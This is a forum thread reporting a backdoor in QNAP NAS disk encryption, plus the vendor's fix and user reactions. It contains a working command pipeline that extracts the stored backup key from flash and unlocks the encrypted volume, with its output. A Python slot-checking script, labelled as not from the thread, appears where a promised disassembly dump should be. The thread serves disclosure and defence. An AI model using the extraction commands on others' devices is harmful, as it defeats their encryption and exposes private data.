Backdoor in the Disk Encryption Feature (verified)

Discussion on setting up QNAP NAS products.
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

I found a medium security vulnerability in the disk encryption functionality over a month ago (the key file to unlock was written to a /tmp/ file and then just deleted, so it could be recovered) and got feedback from the Qnap tech team that this issue was fixed in the last firmware update (3.1.1 Build 0815T).

So I reviewed the implementation to ensure that now the temporary key file is properly overwritten before deletion - and yes, it is done.

However, in that process I found a backdoor which is so blatantly obvious that I overlooked it the first time, and I just thought this is how things work with LUKS, which I had never used before.
So I really have to apologize here that I, as a security professional, overlooked this gaping hole.

The backdoor is like this: beside the key the user is using, a backup key is generated and written to the flash. So anybody who gets access to the flash (local admin rights on QNAP shell), can read out the backup key and access the encrypted harddisk without a passphrase!

And everyone who is using the disk encryption option can verify this for themselves:

This requires perl for the string manipulation. If it is not installed by SqueezeCenter (/share/MD0_DATA/SSODS/bin/perl) and not installed via OptPkg, do this on a different machine, or do the reorder by hand (see below).


[/] # strings /dev/sdx6 | grep ENCK | awk -F= '{print$2}' | perl -e '$in=<STDIN>;$tmp1=substr($in,0,24);$tmp2=reverse(substr($in,24,8));print $tmp2 . $tmp1;' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 0 unlocked.
Command successful.
Explanation:
The backdoor key is in the ENCK variable in the flash device ("grep ENCK /dev/sdx6"). A simple string manipulation has to be performed so it is valid as a key:
Key in ENCK : ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
After reorder: 543210ZYABCDEFGHIJKLMNOPQRSTUVWX
This reordered key has to be written to a temporary file WITHOUT A LINEFEED.
That's all there is to it ...


Just for completeness, this is how it works with your passphrase in case you want to access the hard drive on a different Linux machine:


# this requires a crypt command which supports md5. It's not installed on QNAP, so do this on a Linux system where it is available
[/] # crypt '$1$YCCaQNAP$' 'yourpassphrase' | tr -d '\n' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 1 unlocked.
Command successful.
The "tr -d '\n'" removes the linefeed from the output.

In case you don't have the crypt command on your Linux, compile this yourself:


// compile with "gcc -o crypt crypt.c -lcrypt"
// usage: ./crypt '<salt>' '<passphrase>'   (e.g. salt '$1$YCCaQNAP$' for the MD5 scheme)
#define _XOPEN_SOURCE        /* must come before the includes so crypt() is declared */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>           /* declares crypt() on current glibc/libxcrypt */

int main(int argc, char *argv[]) {
  char *result;
  if (argc != 3) {
    fprintf(stderr, "usage: %s salt passphrase\n", argv[0]);
    return 1;
  }
  /* crypt() takes the key first and the salt second; the "$1$" prefix
     in the salt selects MD5. Passing argv[2] directly avoids the
     unchecked strcpy() into a fixed-size buffer. */
  result = crypt(argv[2], argv[1]);
  if (result == NULL) {
    perror("crypt");
    return 1;
  }
  printf("%s\n", result);
  return 0;
}
So let's hope they remove this backdoor asap from their firmware image!
In the meantime you have to overwrite the saved ENCK key with a random string.
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Re: Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

Some updates:

I could verify with one more user that the backdoor also exists on his device, and with another user that he has two keyslots and the ENCK key is present in the flash.

"grep ENCK /dev/sdx6" does not always find the ENCK key.
"strings /dev/sdx6 | grep ENCK" is more reliable. I edited the initial post to reflect that.

To check if the backdoor is also active in your installation, two things have to be in effect: the ENCK key has to be present in the flash, and two keyslots have to exist.
Execute the following command: "/sbin/cryptsetup luksDump /dev/md0".
If Keyslots 0 and 1 are enabled, the backdoor is active.

When analysing the binary code paths, I could see that depending on some values, the bytes of the ENCK keys are shuffled as described above, and on some they are not. So if the ENCK key is not working in the described shuffled format, try again with the ENCK value like it is.

For informational purposes: below is a screen dump of the disassembly of the function Get_Key_File, which extracts the backup key from the flash.

Please, more people report if it works for them. Thanks.
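The check marcmarc gives above (run luksDump; if key slots 0 and 1 are both enabled, the backup key is in play) can be scripted so that it can be repeated on several devices. The following is an added example, not code from this thread or from QNAP: it parses the LUKS1-style output of `/sbin/cryptsetup luksDump /dev/md0` and reports whether the slot-0-plus-slot-1 pattern is present. The dump text embedded below is constructed for the example (header fields shortened), not captured from a real NAS, and the script only reads the header, it changes nothing.

```python
"""Check a LUKS1 header dump for the two-key-slot pattern marcmarc describes.

Added example, not code from the thread: parses the output of
`/sbin/cryptsetup luksDump <device>` (LUKS1 format, as used by the
2009-era firmware) and reports whether key slots 0 and 1 are both
enabled, which is the condition the post gives for the backup key
being active.
"""
import re
import subprocess
import sys

# LUKS1 luksDump prints one "Key Slot N: ENABLED|DISABLED" line per slot.
_SLOT_RE = re.compile(r"^Key Slot (\d+):\s*(ENABLED|DISABLED)\s*$", re.MULTILINE)

# Constructed sample dump (header fields shortened); not captured from a device.
SAMPLE_DUMP_TWO_SLOTS = """\
LUKS header information for /dev/md0

Version:       \t1
Cipher name:   \taes
Cipher mode:   \tcbc-essiv:sha256
Hash spec:     \tsha1
MK bits:       \t256
UUID:          \t00000000-0000-0000-0000-000000000000

Key Slot 0: ENABLED
\tIterations:         \t10000
\tSalt:               \t00 00 00 00
\tKey material offset:\t8
\tAF stripes:            \t4000
Key Slot 1: ENABLED
\tIterations:         \t10000
\tSalt:               \t00 00 00 00
\tKey material offset:\t264
\tAF stripes:            \t4000
Key Slot 2: DISABLED
Key Slot 3: DISABLED
Key Slot 4: DISABLED
Key Slot 5: DISABLED
Key Slot 6: DISABLED
Key Slot 7: DISABLED
"""

# Constructed sample of a volume where only the passphrase slot (slot 1 in
# marcmarc's session) is enabled.
SAMPLE_DUMP_ONE_SLOT = SAMPLE_DUMP_TWO_SLOTS.replace(
    "Key Slot 0: ENABLED", "Key Slot 0: DISABLED")


def enabled_slots(dump_text):
    """Return the set of key-slot numbers marked ENABLED in a luksDump."""
    return {int(n) for n, state in _SLOT_RE.findall(dump_text) if state == "ENABLED"}


def backup_slot_indicator(dump_text):
    """True if slots 0 and 1 are both enabled (the criterion from the post).

    This reproduces marcmarc's check only; it does not prove that slot 0 is
    unlocked by the flash-stored key, it flags a volume worth inspecting.
    """
    return {0, 1} <= enabled_slots(dump_text)


def describe(dump_text):
    """Human-readable summary for one dump."""
    slots = sorted(enabled_slots(dump_text))
    verdict = ("slots 0 and 1 enabled, backup-key indicator present"
               if backup_slot_indicator(dump_text)
               else "no 0+1 slot pair, indicator absent")
    return "enabled key slots: %s; %s" % (slots, verdict)


def dump_device(device):
    """Run cryptsetup luksDump on a real device (read-only, needs root)."""
    out = subprocess.run(["/sbin/cryptsetup", "luksDump", device],
                         capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    # With a device argument, inspect it; without one, show the constructed samples.
    if len(sys.argv) > 1:
        print(describe(dump_device(sys.argv[1])))
    else:
        print("sample with slots 0+1: ", describe(SAMPLE_DUMP_TWO_SLOTS))
        print("sample with slot 1 only:", describe(SAMPLE_DUMP_ONE_SLOT))
```

Run it as `python3 luksdump_check.py /dev/md0` on the NAS (or on any Linux box the disks are attached to) to test a real header; run it without arguments to see the two constructed cases. The parser matches only LUKS1 dump lines; LUKS2 headers print their slots in a different `Keyslots:` section and would need a separate pattern.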
Jeroen1000
New here
Posts: 7
Joined: Tue Mar 17, 2009 8:44 pm

Re: Backdoor in the Disk Encryption Feature (verified)

Post by Jeroen1000 »

I can hardly believe that there are so few replies to this topic? :shock:

Thanks MarcMarc, I have received your message, but I do not have a Qnap device because of a similar reason: the implementation is closed source and I simply do not buy into that. Thanks to your research I now know for sure I won't be buying this NAS. Just imagine the possible consequences if you thought your precious data was safe. :evil:
I'm very much interested in an official response from Qnap!

Perhaps you should contact a few posters from an earlier topic regarding this issue? They will surely be able and willing to help you.
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Re: Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

Qnap confirmed the issue and is working on a firmware update which should remove the backdoor.

I will verify that it does that.

I released a public advisory on the issue, to force Qnap to properly inform the users of the importance of the coming firmware update and to explain to their customers why the backdoor was present.

http://baseline-security.de/downloads/B ... 9-3200.txt
Korrel
Starting out
Posts: 29
Joined: Wed Jun 10, 2009 4:08 am

Re: Backdoor in the Disk Encryption Feature (verified)

Post by Korrel »

Very useful information! This especially implies that the internally saved key in the ENCK variable is not a modification of the user-entered key but a second key.

I corrected my post ( http://forum.qnap.com/viewtopic.php?f=1 ... t=0#p81150 ) accordingly.
'napper
Know my way around
Posts: 130
Joined: Sat Aug 29, 2009 5:59 am

Re: Backdoor in the Disk Encryption Feature (verified)

Post by 'napper »

Still nothing from QNAP about this issue? :?
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Re: Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

There is a beta firmware update (v3.1.2 Build1001) out since the beginning of October which has the following entry:

[Enhancement]
- Provide Enhanced AES-256 encryption in data security

which I assume is the removal of the backdoor. But I have not checked it, as Qnap did not get back to me telling me it's fixed, as they promised.
I will check the next stable firmware update and see if and how the backdoor is removed.

Again, Qnap has learned nothing: removing a security vulnerability or even a backdoor has to be labeled as such, and not weaseled around as "enhancement".
Korrel
Starting out
Posts: 29
Joined: Wed Jun 10, 2009 4:08 am

Re: Backdoor in the Disk Encryption Feature (verified)

Post by Korrel »

Workaround:

There is no workaround available which can be used by a novice user.
I didn't try, but a possible workaround for a novice user could be the following:

1) put an equivalent set of new harddrives in the device and remove the current ones.
2) set up encryption with the same user passphrase as before (a different backup key should be generated)
3) put in the old harddrives again.

Of course the insecure keyslot 0 of LUKS remains, but at least the stored key does not match anymore.
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Re: Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

Korrel wrote: I didn't try, but a possible workaround for a novice user could be the following:
Not sure if this works, as the flash contains three reserved places for backdoor keys.

The easiest would be just to edit the flash with a hex editor and overwrite the saved key.
The key would still be valid, but is not known anymore. However, the key is not generated cryptographically securely, so it still can be cracked; however, this needs quite some time and effort.
marcmarc
Starting out
Posts: 20
Joined: Sun Jun 21, 2009 1:06 am
Location: Berlin & Frankfurt
Contact:

Re: Backdoor in the Disk Encryption Feature (verified)

Post by marcmarc »

I quickly checked the stable firmware v3.1.2 Build1014.
It does remove the backdoor from the crypto volume and from the flash.

However, the offending code is still in the binary. I currently have no time to check if they just put something like "if (1 == 0) ..." before the backdoor code to jump around it, or if they added a new backdoor, or whatever they did.

And what is totally not OK is labeling this issue as "Provide Enhanced AES-256 encryption in data security" in the change description.
kanuut
First post
Posts: 1
Joined: Tue Nov 03, 2009 10:44 pm

Re: Backdoor in the Disk Encryption Feature (verified)

Post by kanuut »

I was searching this forum for information about the AES encryption functionality of the QNAP TS-239 Pro. Thanks to marcmarc I found this thread indicating this encryption is everything else but reliable. I can not understand why nobody officially addresses this huge security breach. By the way QNAP is handling this problem, my confidence in their encryption implementation is not exactly strengthened. On the contrary, marcmarc's discovery contradicts QNAP's statement in this forum that there was no such backdoor (http://forum.qnap.com/viewtopic.php?f=1 ... =10#p63341 also see http://forum.qnap.com/viewtopic.php?f=11&t=11214).
That forces me to wait for the Fujitsu Celvin NAS; perhaps they do a better job in implementing aes disk encryption.
QNAPJason
QNAP Staff
Posts: 5398
Joined: Thu May 21, 2009 2:14 pm
Location: Taipei

Re: Backdoor in the Disk Encryption Feature (verified)

Post by QNAPJason »

Hi soopersonic,
Yes, it's been fixed.
Korrel
Starting out
Posts: 29
Joined: Wed Jun 10, 2009 4:08 am

Re: Backdoor in the Disk Encryption Feature (verified)

Post by Korrel »

I think for LUKS the key entered in the web UI is not used directly.

marcmarc explained it before, that a "salt" is used:

# this requires a crypt command which supports md5. It's not installed on QNAP, so do this on a Linux system where it is available
[/] # crypt '$1$YCCaQNAP$' 'yourpassphrase' | tr -d '\n' > /tmp/testkey
[/] # /sbin/cryptsetup luksOpen /dev/md0 md0 --key-file=/tmp/testkey
key slot 1 unlocked.
Command successful.
will.bohannan
New here
Posts: 3
Joined: Sat May 07, 2011 2:49 am

Re: Backdoor in the Disk Encryption Feature (verified)

Post by will.bohannan »

Is QNAP going to make it possible for the key to be accessed via USB thumb drive?